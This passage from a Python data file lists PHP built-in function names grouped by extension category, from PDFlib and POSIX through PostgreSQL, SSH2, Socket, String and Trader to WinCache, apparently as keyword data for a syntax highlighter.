'PDF_encoding_set_char',
'PDF_end_document',
'PDF_end_font',
'PDF_end_glyph',
'PDF_end_item',
'PDF_end_layer',
'PDF_end_page_ext',
'PDF_end_page',
'PDF_end_pattern',
'PDF_end_template',
'PDF_endpath',
'PDF_fill_imageblock',
'PDF_fill_pdfblock',
'PDF_fill_stroke',
'PDF_fill_textblock',
'PDF_fill',
'PDF_findfont',
'PDF_fit_image',
'PDF_fit_pdi_page',
'PDF_fit_table',
'PDF_fit_textflow',
'PDF_fit_textline',
'PDF_get_apiname',
'PDF_get_buffer',
'PDF_get_errmsg',
'PDF_get_errnum',
'PDF_get_font',
'PDF_get_fontname',
'PDF_get_fontsize',
'PDF_get_image_height',
'PDF_get_image_width',
'PDF_get_majorversion',
'PDF_get_minorversion',
'PDF_get_parameter',
'PDF_get_pdi_parameter',
'PDF_get_pdi_value',
'PDF_get_value',
'PDF_info_font',
'PDF_info_matchbox',
'PDF_info_table',
'PDF_info_textflow',
'PDF_info_textline',
'PDF_initgraphics',
'PDF_lineto',
'PDF_load_3ddata',
'PDF_load_font',
'PDF_load_iccprofile',
'PDF_load_image',
'PDF_makespotcolor',
'PDF_moveto',
'PDF_new',
'PDF_open_ccitt',
'PDF_open_file',
'PDF_open_gif',
'PDF_open_image_file',
'PDF_open_image',
'PDF_open_jpeg',
'PDF_open_memory_image',
'PDF_open_pdi_document',
'PDF_open_pdi_page',
'PDF_open_pdi',
'PDF_open_tiff',
'PDF_pcos_get_number',
'PDF_pcos_get_stream',
'PDF_pcos_get_string',
'PDF_place_image',
'PDF_place_pdi_page',
'PDF_process_pdi',
'PDF_rect',
'PDF_restore',
'PDF_resume_page',
'PDF_rotate',
'PDF_save',
'PDF_scale',
'PDF_set_border_color',
'PDF_set_border_dash',
'PDF_set_border_style',
'PDF_set_char_spacing',
'PDF_set_duration',
'PDF_set_gstate',
'PDF_set_horiz_scaling',
'PDF_set_info_author',
'PDF_set_info_creator',
'PDF_set_info_keywords',
'PDF_set_info_subject',
'PDF_set_info_title',
'PDF_set_info',
'PDF_set_layer_dependency',
'PDF_set_leading',
'PDF_set_parameter',
'PDF_set_text_matrix',
'PDF_set_text_pos',
'PDF_set_text_rendering',
'PDF_set_text_rise',
'PDF_set_value',
'PDF_set_word_spacing',
'PDF_setcolor',
'PDF_setdash',
'PDF_setdashpattern',
'PDF_setflat',
'PDF_setfont',
'PDF_setgray_fill',
'PDF_setgray_stroke',
'PDF_setgray',
'PDF_setlinecap',
'PDF_setlinejoin',
'PDF_setlinewidth',
'PDF_setmatrix',
'PDF_setmiterlimit',
'PDF_setpolydash',
'PDF_setrgbcolor_fill',
'PDF_setrgbcolor_stroke',
'PDF_setrgbcolor',
'PDF_shading_pattern',
'PDF_shading',
'PDF_shfill',
'PDF_show_boxed',
'PDF_show_xy',
'PDF_show',
'PDF_skew',
'PDF_stringwidth',
'PDF_stroke',
'PDF_suspend_page',
'PDF_translate',
'PDF_utf16_to_utf8',
'PDF_utf32_to_utf16',
'PDF_utf8_to_utf16'],
'PHP Options/Info': ['assert_options',
'assert',
'cli_get_process_title',
'cli_set_process_title',
'dl',
'extension_loaded',
'gc_collect_cycles',
'gc_disable',
'gc_enable',
'gc_enabled',
'get_cfg_var',
'get_current_user',
'get_defined_constants',
'get_extension_funcs',
'get_include_path',
'get_included_files',
'get_loaded_extensions',
'get_magic_quotes_gpc',
'get_magic_quotes_runtime',
'get_required_files',
'getenv',
'getlastmod',
'getmygid',
'getmyinode',
'getmypid',
'getmyuid',
'getopt',
'getrusage',
'ini_alter',
'ini_get_all',
'ini_get',
'ini_restore',
'ini_set',
'magic_quotes_runtime',
'memory_get_peak_usage',
'memory_get_usage',
'php_ini_loaded_file',
'php_ini_scanned_files',
'php_logo_guid',
'php_sapi_name',
'php_uname',
'phpcredits',
'phpinfo',
'phpversion',
'putenv',
'restore_include_path',
'set_include_path',
'set_magic_quotes_runtime',
'set_time_limit',
'sys_get_temp_dir',
'version_compare',
'zend_logo_guid',
'zend_thread_id',
'zend_version'],
'POSIX': ['posix_access',
'posix_ctermid',
'posix_errno',
'posix_get_last_error',
'posix_getcwd',
'posix_getegid',
'posix_geteuid',
'posix_getgid',
'posix_getgrgid',
'posix_getgrnam',
'posix_getgroups',
'posix_getlogin',
'posix_getpgid',
'posix_getpgrp',
'posix_getpid',
'posix_getppid',
'posix_getpwnam',
'posix_getpwuid',
'posix_getrlimit',
'posix_getsid',
'posix_getuid',
'posix_initgroups',
'posix_isatty',
'posix_kill',
'posix_mkfifo',
'posix_mknod',
'posix_setegid',
'posix_seteuid',
'posix_setgid',
'posix_setpgid',
'posix_setsid',
'posix_setuid',
'posix_strerror',
'posix_times',
'posix_ttyname',
'posix_uname'],
'POSIX Regex': ['ereg_replace',
'ereg',
'eregi_replace',
'eregi',
'split',
'spliti',
'sql_regcase'],
'PS': ['ps_add_bookmark',
'ps_add_launchlink',
'ps_add_locallink',
'ps_add_note',
'ps_add_pdflink',
'ps_add_weblink',
'ps_arc',
'ps_arcn',
'ps_begin_page',
'ps_begin_pattern',
'ps_begin_template',
'ps_circle',
'ps_clip',
'ps_close_image',
'ps_close',
'ps_closepath_stroke',
'ps_closepath',
'ps_continue_text',
'ps_curveto',
'ps_delete',
'ps_end_page',
'ps_end_pattern',
'ps_end_template',
'ps_fill_stroke',
'ps_fill',
'ps_findfont',
'ps_get_buffer',
'ps_get_parameter',
'ps_get_value',
'ps_hyphenate',
'ps_include_file',
'ps_lineto',
'ps_makespotcolor',
'ps_moveto',
'ps_new',
'ps_open_file',
'ps_open_image_file',
'ps_open_image',
'ps_open_memory_image',
'ps_place_image',
'ps_rect',
'ps_restore',
'ps_rotate',
'ps_save',
'ps_scale',
'ps_set_border_color',
'ps_set_border_dash',
'ps_set_border_style',
'ps_set_info',
'ps_set_parameter',
'ps_set_text_pos',
'ps_set_value',
'ps_setcolor',
'ps_setdash',
'ps_setflat',
'ps_setfont',
'ps_setgray',
'ps_setlinecap',
'ps_setlinejoin',
'ps_setlinewidth',
'ps_setmiterlimit',
'ps_setoverprintmode',
'ps_setpolydash',
'ps_shading_pattern',
'ps_shading',
'ps_shfill',
'ps_show_boxed',
'ps_show_xy2',
'ps_show_xy',
'ps_show2',
'ps_show',
'ps_string_geometry',
'ps_stringwidth',
'ps_stroke',
'ps_symbol_name',
'ps_symbol_width',
'ps_symbol',
'ps_translate'],
'Paradox': ['px_close',
'px_create_fp',
'px_date2string',
'px_delete_record',
'px_delete',
'px_get_field',
'px_get_info',
'px_get_parameter',
'px_get_record',
'px_get_schema',
'px_get_value',
'px_insert_record',
'px_new',
'px_numfields',
'px_numrecords',
'px_open_fp',
'px_put_record',
'px_retrieve_record',
'px_set_blob_file',
'px_set_parameter',
'px_set_tablename',
'px_set_targetencoding',
'px_set_value',
'px_timestamp2string',
'px_update_record'],
'Parsekit': ['parsekit_compile_file',
'parsekit_compile_string',
'parsekit_func_arginfo'],
'Password Hashing': ['password_get_info',
'password_hash',
'password_needs_rehash',
'password_verify'],
'PostgreSQL': ['pg_affected_rows',
'pg_cancel_query',
'pg_client_encoding',
'pg_close',
'pg_connect',
'pg_connection_busy',
'pg_connection_reset',
'pg_connection_status',
'pg_convert',
'pg_copy_from',
'pg_copy_to',
'pg_dbname',
'pg_delete',
'pg_end_copy',
'pg_escape_bytea',
'pg_escape_identifier',
'pg_escape_literal',
'pg_escape_string',
'pg_execute',
'pg_fetch_all_columns',
'pg_fetch_all',
'pg_fetch_array',
'pg_fetch_assoc',
'pg_fetch_object',
'pg_fetch_result',
'pg_fetch_row',
'pg_field_is_null',
'pg_field_name',
'pg_field_num',
'pg_field_prtlen',
'pg_field_size',
'pg_field_table',
'pg_field_type_oid',
'pg_field_type',
'pg_free_result',
'pg_get_notify',
'pg_get_pid',
'pg_get_result',
'pg_host',
'pg_insert',
'pg_last_error',
'pg_last_notice',
'pg_last_oid',
'pg_lo_close',
'pg_lo_create',
'pg_lo_export',
'pg_lo_import',
'pg_lo_open',
'pg_lo_read_all',
'pg_lo_read',
'pg_lo_seek',
'pg_lo_tell',
'pg_lo_truncate',
'pg_lo_unlink',
'pg_lo_write',
'pg_meta_data',
'pg_num_fields',
'pg_num_rows',
'pg_options',
'pg_parameter_status',
'pg_pconnect',
'pg_ping',
'pg_port',
'pg_prepare',
'pg_put_line',
'pg_query_params',
'pg_query',
'pg_result_error_field',
'pg_result_error',
'pg_result_seek',
'pg_result_status',
'pg_select',
'pg_send_execute',
'pg_send_prepare',
'pg_send_query_params',
'pg_send_query',
'pg_set_client_encoding',
'pg_set_error_verbosity',
'pg_trace',
'pg_transaction_status',
'pg_tty',
'pg_unescape_bytea',
'pg_untrace',
'pg_update',
'pg_version'],
'Printer': ['printer_abort',
'printer_close',
'printer_create_brush',
'printer_create_dc',
'printer_create_font',
'printer_create_pen',
'printer_delete_brush',
'printer_delete_dc',
'printer_delete_font',
'printer_delete_pen',
'printer_draw_bmp',
'printer_draw_chord',
'printer_draw_elipse',
'printer_draw_line',
'printer_draw_pie',
'printer_draw_rectangle',
'printer_draw_roundrect',
'printer_draw_text',
'printer_end_doc',
'printer_end_page',
'printer_get_option',
'printer_list',
'printer_logical_fontheight',
'printer_open',
'printer_select_brush',
'printer_select_font',
'printer_select_pen',
'printer_set_option',
'printer_start_doc',
'printer_start_page',
'printer_write'],
'Proctitle': ['setproctitle', 'setthreadtitle'],
'Program execution': ['escapeshellarg',
'escapeshellcmd',
'exec',
'passthru',
'proc_close',
'proc_get_status',
'proc_nice',
'proc_open',
'proc_terminate',
'shell_exec',
'system'],
'Pspell': ['pspell_add_to_personal',
'pspell_add_to_session',
'pspell_check',
'pspell_clear_session',
'pspell_config_create',
'pspell_config_data_dir',
'pspell_config_dict_dir',
'pspell_config_ignore',
'pspell_config_mode',
'pspell_config_personal',
'pspell_config_repl',
'pspell_config_runtogether',
'pspell_config_save_repl',
'pspell_new_config',
'pspell_new_personal',
'pspell_new',
'pspell_save_wordlist',
'pspell_store_replacement',
'pspell_suggest'],
'RPM Reader': ['rpm_close',
'rpm_get_tag',
'rpm_is_valid',
'rpm_open',
'rpm_version'],
'RRD': ['rrd_create',
'rrd_error',
'rrd_fetch',
'rrd_first',
'rrd_graph',
'rrd_info',
'rrd_last',
'rrd_lastupdate',
'rrd_restore',
'rrd_tune',
'rrd_update',
'rrd_version',
'rrd_xport',
'rrdc_disconnect'],
'Radius': ['radius_acct_open',
'radius_add_server',
'radius_auth_open',
'radius_close',
'radius_config',
'radius_create_request',
'radius_cvt_addr',
'radius_cvt_int',
'radius_cvt_string',
'radius_demangle_mppe_key',
'radius_demangle',
'radius_get_attr',
'radius_get_tagged_attr_data',
'radius_get_tagged_attr_tag',
'radius_get_vendor_attr',
'radius_put_addr',
'radius_put_attr',
'radius_put_int',
'radius_put_string',
'radius_put_vendor_addr',
'radius_put_vendor_attr',
'radius_put_vendor_int',
'radius_put_vendor_string',
'radius_request_authenticator',
'radius_salt_encrypt_attr',
'radius_send_request',
'radius_server_secret',
'radius_strerror'],
'Rar': ['rar_wrapper_cache_stats'],
'Readline': ['readline_add_history',
'readline_callback_handler_install',
'readline_callback_handler_remove',
'readline_callback_read_char',
'readline_clear_history',
'readline_completion_function',
'readline_info',
'readline_list_history',
'readline_on_new_line',
'readline_read_history',
'readline_redisplay',
'readline_write_history',
'readline'],
'Recode': ['recode_file', 'recode_string', 'recode'],
'SNMP': ['snmp_get_quick_print',
'snmp_get_valueretrieval',
'snmp_read_mib',
'snmp_set_enum_print',
'snmp_set_oid_numeric_print',
'snmp_set_oid_output_format',
'snmp_set_quick_print',
'snmp_set_valueretrieval',
'snmp2_get',
'snmp2_getnext',
'snmp2_real_walk',
'snmp2_set',
'snmp2_walk',
'snmp3_get',
'snmp3_getnext',
'snmp3_real_walk',
'snmp3_set',
'snmp3_walk',
'snmpget',
'snmpgetnext',
'snmprealwalk',
'snmpset',
'snmpwalk',
'snmpwalkoid'],
'SOAP': ['is_soap_fault', 'use_soap_error_handler'],
'SPL': ['class_implements',
'class_parents',
'class_uses',
'iterator_apply',
'iterator_count',
'iterator_to_array',
'spl_autoload_call',
'spl_autoload_extensions',
'spl_autoload_functions',
'spl_autoload_register',
'spl_autoload_unregister',
'spl_autoload',
'spl_classes',
'spl_object_hash'],
'SPPLUS': ['calcul_hmac', 'calculhmac', 'nthmac', 'signeurlpaiement'],
'SQLSRV': ['sqlsrv_begin_transaction',
'sqlsrv_cancel',
'sqlsrv_client_info',
'sqlsrv_close',
'sqlsrv_commit',
'sqlsrv_configure',
'sqlsrv_connect',
'sqlsrv_errors',
'sqlsrv_execute',
'sqlsrv_fetch_array',
'sqlsrv_fetch_object',
'sqlsrv_fetch',
'sqlsrv_field_metadata',
'sqlsrv_free_stmt',
'sqlsrv_get_config',
'sqlsrv_get_field',
'sqlsrv_has_rows',
'sqlsrv_next_result',
'sqlsrv_num_fields',
'sqlsrv_num_rows',
'sqlsrv_prepare',
'sqlsrv_query',
'sqlsrv_rollback',
'sqlsrv_rows_affected',
'sqlsrv_send_stream_data',
'sqlsrv_server_info'],
'SQLite': ['sqlite_array_query',
'sqlite_busy_timeout',
'sqlite_changes',
'sqlite_close',
'sqlite_column',
'sqlite_create_aggregate',
'sqlite_create_function',
'sqlite_current',
'sqlite_error_string',
'sqlite_escape_string',
'sqlite_exec',
'sqlite_factory',
'sqlite_fetch_all',
'sqlite_fetch_array',
'sqlite_fetch_column_types',
'sqlite_fetch_object',
'sqlite_fetch_single',
'sqlite_fetch_string',
'sqlite_field_name',
'sqlite_has_more',
'sqlite_has_prev',
'sqlite_key',
'sqlite_last_error',
'sqlite_last_insert_rowid',
'sqlite_libencoding',
'sqlite_libversion',
'sqlite_next',
'sqlite_num_fields',
'sqlite_num_rows',
'sqlite_open',
'sqlite_popen',
'sqlite_prev',
'sqlite_query',
'sqlite_rewind',
'sqlite_seek',
'sqlite_single_query',
'sqlite_udf_decode_binary',
'sqlite_udf_encode_binary',
'sqlite_unbuffered_query',
'sqlite_valid'],
'SSH2': ['ssh2_auth_agent',
'ssh2_auth_hostbased_file',
'ssh2_auth_none',
'ssh2_auth_password',
'ssh2_auth_pubkey_file',
'ssh2_connect',
'ssh2_exec',
'ssh2_fetch_stream',
'ssh2_fingerprint',
'ssh2_methods_negotiated',
'ssh2_publickey_add',
'ssh2_publickey_init',
'ssh2_publickey_list',
'ssh2_publickey_remove',
'ssh2_scp_recv',
'ssh2_scp_send',
'ssh2_sftp_chmod',
'ssh2_sftp_lstat',
'ssh2_sftp_mkdir',
'ssh2_sftp_readlink',
'ssh2_sftp_realpath',
'ssh2_sftp_rename',
'ssh2_sftp_rmdir',
'ssh2_sftp_stat',
'ssh2_sftp_symlink',
'ssh2_sftp_unlink',
'ssh2_sftp',
'ssh2_shell',
'ssh2_tunnel'],
'SVN': ['svn_add',
'svn_auth_get_parameter',
'svn_auth_set_parameter',
'svn_blame',
'svn_cat',
'svn_checkout',
'svn_cleanup',
'svn_client_version',
'svn_commit',
'svn_delete',
'svn_diff',
'svn_export',
'svn_fs_abort_txn',
'svn_fs_apply_text',
'svn_fs_begin_txn2',
'svn_fs_change_node_prop',
'svn_fs_check_path',
'svn_fs_contents_changed',
'svn_fs_copy',
'svn_fs_delete',
'svn_fs_dir_entries',
'svn_fs_file_contents',
'svn_fs_file_length',
'svn_fs_is_dir',
'svn_fs_is_file',
'svn_fs_make_dir',
'svn_fs_make_file',
'svn_fs_node_created_rev',
'svn_fs_node_prop',
'svn_fs_props_changed',
'svn_fs_revision_prop',
'svn_fs_revision_root',
'svn_fs_txn_root',
'svn_fs_youngest_rev',
'svn_import',
'svn_log',
'svn_ls',
'svn_mkdir',
'svn_repos_create',
'svn_repos_fs_begin_txn_for_commit',
'svn_repos_fs_commit_txn',
'svn_repos_fs',
'svn_repos_hotcopy',
'svn_repos_open',
'svn_repos_recover',
'svn_revert',
'svn_status',
'svn_update'],
'SWF': ['swf_actiongeturl',
'swf_actiongotoframe',
'swf_actiongotolabel',
'swf_actionnextframe',
'swf_actionplay',
'swf_actionprevframe',
'swf_actionsettarget',
'swf_actionstop',
'swf_actiontogglequality',
'swf_actionwaitforframe',
'swf_addbuttonrecord',
'swf_addcolor',
'swf_closefile',
'swf_definebitmap',
'swf_definefont',
'swf_defineline',
'swf_definepoly',
'swf_definerect',
'swf_definetext',
'swf_endbutton',
'swf_enddoaction',
'swf_endshape',
'swf_endsymbol',
'swf_fontsize',
'swf_fontslant',
'swf_fonttracking',
'swf_getbitmapinfo',
'swf_getfontinfo',
'swf_getframe',
'swf_labelframe',
'swf_lookat',
'swf_modifyobject',
'swf_mulcolor',
'swf_nextid',
'swf_oncondition',
'swf_openfile',
'swf_ortho2',
'swf_ortho',
'swf_perspective',
'swf_placeobject',
'swf_polarview',
'swf_popmatrix',
'swf_posround',
'swf_pushmatrix',
'swf_removeobject',
'swf_rotate',
'swf_scale',
'swf_setfont',
'swf_setframe',
'swf_shapearc',
'swf_shapecurveto3',
'swf_shapecurveto',
'swf_shapefillbitmapclip',
'swf_shapefillbitmaptile',
'swf_shapefilloff',
'swf_shapefillsolid',
'swf_shapelinesolid',
'swf_shapelineto',
'swf_shapemoveto',
'swf_showframe',
'swf_startbutton',
'swf_startdoaction',
'swf_startshape',
'swf_startsymbol',
'swf_textwidth',
'swf_translate',
'swf_viewport'],
'Semaphore': ['ftok',
'msg_get_queue',
'msg_queue_exists',
'msg_receive',
'msg_remove_queue',
'msg_send',
'msg_set_queue',
'msg_stat_queue',
'sem_acquire',
'sem_get',
'sem_release',
'sem_remove',
'shm_attach',
'shm_detach',
'shm_get_var',
'shm_has_var',
'shm_put_var',
'shm_remove_var',
'shm_remove'],
'Session': ['session_cache_expire',
'session_cache_limiter',
'session_commit',
'session_decode',
'session_destroy',
'session_encode',
'session_get_cookie_params',
'session_id',
'session_is_registered',
'session_module_name',
'session_name',
'session_regenerate_id',
'session_register_shutdown',
'session_register',
'session_save_path',
'session_set_cookie_params',
'session_set_save_handler',
'session_start',
'session_status',
'session_unregister',
'session_unset',
'session_write_close'],
'Session PgSQL': ['session_pgsql_add_error',
'session_pgsql_get_error',
'session_pgsql_get_field',
'session_pgsql_reset',
'session_pgsql_set_field',
'session_pgsql_status'],
'Shared Memory': ['shmop_close',
'shmop_delete',
'shmop_open',
'shmop_read',
'shmop_size',
'shmop_write'],
'SimpleXML': ['simplexml_import_dom',
'simplexml_load_file',
'simplexml_load_string'],
'Socket': ['socket_accept',
'socket_bind',
'socket_clear_error',
'socket_close',
'socket_cmsg_space',
'socket_connect',
'socket_create_listen',
'socket_create_pair',
'socket_create',
'socket_get_option',
'socket_getpeername',
'socket_getsockname',
'socket_import_stream',
'socket_last_error',
'socket_listen',
'socket_read',
'socket_recv',
'socket_recvfrom',
'socket_recvmsg',
'socket_select',
'socket_send',
'socket_sendmsg',
'socket_sendto',
'socket_set_block',
'socket_set_nonblock',
'socket_set_option',
'socket_shutdown',
'socket_strerror',
'socket_write'],
'Solr': ['solr_get_version'],
'Statistic': ['stats_absolute_deviation',
'stats_cdf_beta',
'stats_cdf_binomial',
'stats_cdf_cauchy',
'stats_cdf_chisquare',
'stats_cdf_exponential',
'stats_cdf_f',
'stats_cdf_gamma',
'stats_cdf_laplace',
'stats_cdf_logistic',
'stats_cdf_negative_binomial',
'stats_cdf_noncentral_chisquare',
'stats_cdf_noncentral_f',
'stats_cdf_poisson',
'stats_cdf_t',
'stats_cdf_uniform',
'stats_cdf_weibull',
'stats_covariance',
'stats_den_uniform',
'stats_dens_beta',
'stats_dens_cauchy',
'stats_dens_chisquare',
'stats_dens_exponential',
'stats_dens_f',
'stats_dens_gamma',
'stats_dens_laplace',
'stats_dens_logistic',
'stats_dens_negative_binomial',
'stats_dens_normal',
'stats_dens_pmf_binomial',
'stats_dens_pmf_hypergeometric',
'stats_dens_pmf_poisson',
'stats_dens_t',
'stats_dens_weibull',
'stats_harmonic_mean',
'stats_kurtosis',
'stats_rand_gen_beta',
'stats_rand_gen_chisquare',
'stats_rand_gen_exponential',
'stats_rand_gen_f',
'stats_rand_gen_funiform',
'stats_rand_gen_gamma',
'stats_rand_gen_ibinomial_negative',
'stats_rand_gen_ibinomial',
'stats_rand_gen_int',
'stats_rand_gen_ipoisson',
'stats_rand_gen_iuniform',
'stats_rand_gen_noncenral_chisquare',
'stats_rand_gen_noncentral_f',
'stats_rand_gen_noncentral_t',
'stats_rand_gen_normal',
'stats_rand_gen_t',
'stats_rand_get_seeds',
'stats_rand_phrase_to_seeds',
'stats_rand_ranf',
'stats_rand_setall',
'stats_skew',
'stats_standard_deviation',
'stats_stat_binomial_coef',
'stats_stat_correlation',
'stats_stat_gennch',
'stats_stat_independent_t',
'stats_stat_innerproduct',
'stats_stat_noncentral_t',
'stats_stat_paired_t',
'stats_stat_percentile',
'stats_stat_powersum',
'stats_variance'],
'Stomp': ['stomp_connect_error', 'stomp_version'],
'Stream': ['set_socket_blocking',
'stream_bucket_append',
'stream_bucket_make_writeable',
'stream_bucket_new',
'stream_bucket_prepend',
'stream_context_create',
'stream_context_get_default',
'stream_context_get_options',
'stream_context_get_params',
'stream_context_set_default',
'stream_context_set_option',
'stream_context_set_params',
'stream_copy_to_stream',
'stream_encoding',
'stream_filter_append',
'stream_filter_prepend',
'stream_filter_register',
'stream_filter_remove',
'stream_get_contents',
'stream_get_filters',
'stream_get_line',
'stream_get_meta_data',
'stream_get_transports',
'stream_get_wrappers',
'stream_is_local',
'stream_notification_callback',
'stream_register_wrapper',
'stream_resolve_include_path',
'stream_select',
'stream_set_blocking',
'stream_set_chunk_size',
'stream_set_read_buffer',
'stream_set_timeout',
'stream_set_write_buffer',
'stream_socket_accept',
'stream_socket_client',
'stream_socket_enable_crypto',
'stream_socket_get_name',
'stream_socket_pair',
'stream_socket_recvfrom',
'stream_socket_sendto',
'stream_socket_server',
'stream_socket_shutdown',
'stream_supports_lock',
'stream_wrapper_register',
'stream_wrapper_restore',
'stream_wrapper_unregister'],
'String': ['addcslashes',
'addslashes',
'bin2hex',
'chop',
'chr',
'chunk_split',
'convert_cyr_string',
'convert_uudecode',
'convert_uuencode',
'count_chars',
'crc32',
'crypt',
'echo',
'explode',
'fprintf',
'get_html_translation_table',
'hebrev',
'hebrevc',
'hex2bin',
'html_entity_decode',
'htmlentities',
'htmlspecialchars_decode',
'htmlspecialchars',
'implode',
'join',
'lcfirst',
'levenshtein',
'localeconv',
'ltrim',
'md5_file',
'md5',
'metaphone',
'money_format',
'nl_langinfo',
'nl2br',
'number_format',
'ord',
'parse_str',
'print',
'printf',
'quoted_printable_decode',
'quoted_printable_encode',
'quotemeta',
'rtrim',
'setlocale',
'sha1_file',
'sha1',
'similar_text',
'soundex',
'sprintf',
'sscanf',
'str_getcsv',
'str_ireplace',
'str_pad',
'str_repeat',
'str_replace',
'str_rot13',
'str_shuffle',
'str_split',
'str_word_count',
'strcasecmp',
'strchr',
'strcmp',
'strcoll',
'strcspn',
'strip_tags',
'stripcslashes',
'stripos',
'stripslashes',
'stristr',
'strlen',
'strnatcasecmp',
'strnatcmp',
'strncasecmp',
'strncmp',
'strpbrk',
'strpos',
'strrchr',
'strrev',
'strripos',
'strrpos',
'strspn',
'strstr',
'strtok',
'strtolower',
'strtoupper',
'strtr',
'substr_compare',
'substr_count',
'substr_replace',
'substr',
'trim',
'ucfirst',
'ucwords',
'vfprintf',
'vprintf',
'vsprintf',
'wordwrap'],
'Sybase': ['sybase_affected_rows',
'sybase_close',
'sybase_connect',
'sybase_data_seek',
'sybase_deadlock_retry_count',
'sybase_fetch_array',
'sybase_fetch_assoc',
'sybase_fetch_field',
'sybase_fetch_object',
'sybase_fetch_row',
'sybase_field_seek',
'sybase_free_result',
'sybase_get_last_message',
'sybase_min_client_severity',
'sybase_min_error_severity',
'sybase_min_message_severity',
'sybase_min_server_severity',
'sybase_num_fields',
'sybase_num_rows',
'sybase_pconnect',
'sybase_query',
'sybase_result',
'sybase_select_db',
'sybase_set_message_handler',
'sybase_unbuffered_query'],
'TCP': ['tcpwrap_check'],
'Taint': ['is_tainted', 'taint', 'untaint'],
'Tidy': ['ob_tidyhandler',
'tidy_access_count',
'tidy_config_count',
'tidy_error_count',
'tidy_get_output',
'tidy_load_config',
'tidy_reset_config',
'tidy_save_config',
'tidy_set_encoding',
'tidy_setopt',
'tidy_warning_count'],
'Tokenizer': ['token_get_all', 'token_name'],
'Trader': ['trader_acos',
'trader_ad',
'trader_add',
'trader_adosc',
'trader_adx',
'trader_adxr',
'trader_apo',
'trader_aroon',
'trader_aroonosc',
'trader_asin',
'trader_atan',
'trader_atr',
'trader_avgprice',
'trader_bbands',
'trader_beta',
'trader_bop',
'trader_cci',
'trader_cdl2crows',
'trader_cdl3blackcrows',
'trader_cdl3inside',
'trader_cdl3linestrike',
'trader_cdl3outside',
'trader_cdl3starsinsouth',
'trader_cdl3whitesoldiers',
'trader_cdlabandonedbaby',
'trader_cdladvanceblock',
'trader_cdlbelthold',
'trader_cdlbreakaway',
'trader_cdlclosingmarubozu',
'trader_cdlconcealbabyswall',
'trader_cdlcounterattack',
'trader_cdldarkcloudcover',
'trader_cdldoji',
'trader_cdldojistar',
'trader_cdldragonflydoji',
'trader_cdlengulfing',
'trader_cdleveningdojistar',
'trader_cdleveningstar',
'trader_cdlgapsidesidewhite',
'trader_cdlgravestonedoji',
'trader_cdlhammer',
'trader_cdlhangingman',
'trader_cdlharami',
'trader_cdlharamicross',
'trader_cdlhighwave',
'trader_cdlhikkake',
'trader_cdlhikkakemod',
'trader_cdlhomingpigeon',
'trader_cdlidentical3crows',
'trader_cdlinneck',
'trader_cdlinvertedhammer',
'trader_cdlkicking',
'trader_cdlkickingbylength',
'trader_cdlladderbottom',
'trader_cdllongleggeddoji',
'trader_cdllongline',
'trader_cdlmarubozu',
'trader_cdlmatchinglow',
'trader_cdlmathold',
'trader_cdlmorningdojistar',
'trader_cdlmorningstar',
'trader_cdlonneck',
'trader_cdlpiercing',
'trader_cdlrickshawman',
'trader_cdlrisefall3methods',
'trader_cdlseparatinglines',
'trader_cdlshootingstar',
'trader_cdlshortline',
'trader_cdlspinningtop',
'trader_cdlstalledpattern',
'trader_cdlsticksandwich',
'trader_cdltakuri',
'trader_cdltasukigap',
'trader_cdlthrusting',
'trader_cdltristar',
'trader_cdlunique3river',
'trader_cdlupsidegap2crows',
'trader_cdlxsidegap3methods',
'trader_ceil',
'trader_cmo',
'trader_correl',
'trader_cos',
'trader_cosh',
'trader_dema',
'trader_div',
'trader_dx',
'trader_ema',
'trader_errno',
'trader_exp',
'trader_floor',
'trader_get_compat',
'trader_get_unstable_period',
'trader_ht_dcperiod',
'trader_ht_dcphase',
'trader_ht_phasor',
'trader_ht_sine',
'trader_ht_trendline',
'trader_ht_trendmode',
'trader_kama',
'trader_linearreg_angle',
'trader_linearreg_intercept',
'trader_linearreg_slope',
'trader_linearreg',
'trader_ln',
'trader_log10',
'trader_ma',
'trader_macd',
'trader_macdext',
'trader_macdfix',
'trader_mama',
'trader_mavp',
'trader_max',
'trader_maxindex',
'trader_medprice',
'trader_mfi',
'trader_midpoint',
'trader_midprice',
'trader_min',
'trader_minindex',
'trader_minmax',
'trader_minmaxindex',
'trader_minus_di',
'trader_minus_dm',
'trader_mom',
'trader_mult',
'trader_natr',
'trader_obv',
'trader_plus_di',
'trader_plus_dm',
'trader_ppo',
'trader_roc',
'trader_rocp',
'trader_rocr100',
'trader_rocr',
'trader_rsi',
'trader_sar',
'trader_sarext',
'trader_set_compat',
'trader_set_unstable_period',
'trader_sin',
'trader_sinh',
'trader_sma',
'trader_sqrt',
'trader_stddev',
'trader_stoch',
'trader_stochf',
'trader_stochrsi',
'trader_sub',
'trader_sum',
'trader_t3',
'trader_tan',
'trader_tanh',
'trader_tema',
'trader_trange',
'trader_trima',
'trader_trix',
'trader_tsf',
'trader_typprice',
'trader_ultosc',
'trader_var',
'trader_wclprice',
'trader_willr',
'trader_wma'],
'URL': ['base64_decode',
'base64_encode',
'get_headers',
'get_meta_tags',
'http_build_query',
'parse_url',
'rawurldecode',
'rawurlencode',
'urldecode',
'urlencode'],
'Uopz': ['uopz_backup',
'uopz_compose',
'uopz_copy',
'uopz_delete',
'uopz_extend',
'uopz_flags',
'uopz_function',
'uopz_implement',
'uopz_overload',
'uopz_redefine',
'uopz_rename',
'uopz_restore',
'uopz_undefine'],
'Variable handling': ['boolval',
'debug_zval_dump',
'doubleval',
'empty',
'floatval',
'get_defined_vars',
'get_resource_type',
'gettype',
'import_request_variables',
'intval',
'is_array',
'is_bool',
'is_callable',
'is_double',
'is_float',
'is_int',
'is_integer',
'is_long',
'is_null',
'is_numeric',
'is_object',
'is_real',
'is_resource',
'is_scalar',
'is_string',
'isset',
'print_r',
'serialize',
'settype',
'strval',
'unserialize',
'unset',
'var_dump',
'var_export'],
'W32api': ['w32api_deftype',
'w32api_init_dtype',
'w32api_invoke_function',
'w32api_register_function',
'w32api_set_call_method'],
'WDDX': ['wddx_add_vars',
'wddx_deserialize',
'wddx_packet_end',
'wddx_packet_start',
'wddx_serialize_value',
'wddx_serialize_vars'],
'WinCache': ['wincache_fcache_fileinfo',
'wincache_fcache_meminfo',
'wincache_lock',
'wincache_ocache_fileinfo',
'wincache_ocache_meminfo',
'wincache_refresh_if_changed',
'wincache_rplist_fileinfo',
'wincache_rplist_meminfo',
'wincache_scache_info',
'wincache_scache_meminfo',
'wincache_ucache_add',
'wincache_ucache_cas',
'wincache_ucache_clear',
'wincache_ucache_dec',
'wincache_ucache_delete',
'wincache_ucache_exists',
'wincache_ucache_get',
'wincache_ucache_inc',
'wincache_ucache_info',
'wincache_ucache_meminfo',
'wincache_ucache_set',
'wincache_unlock'],
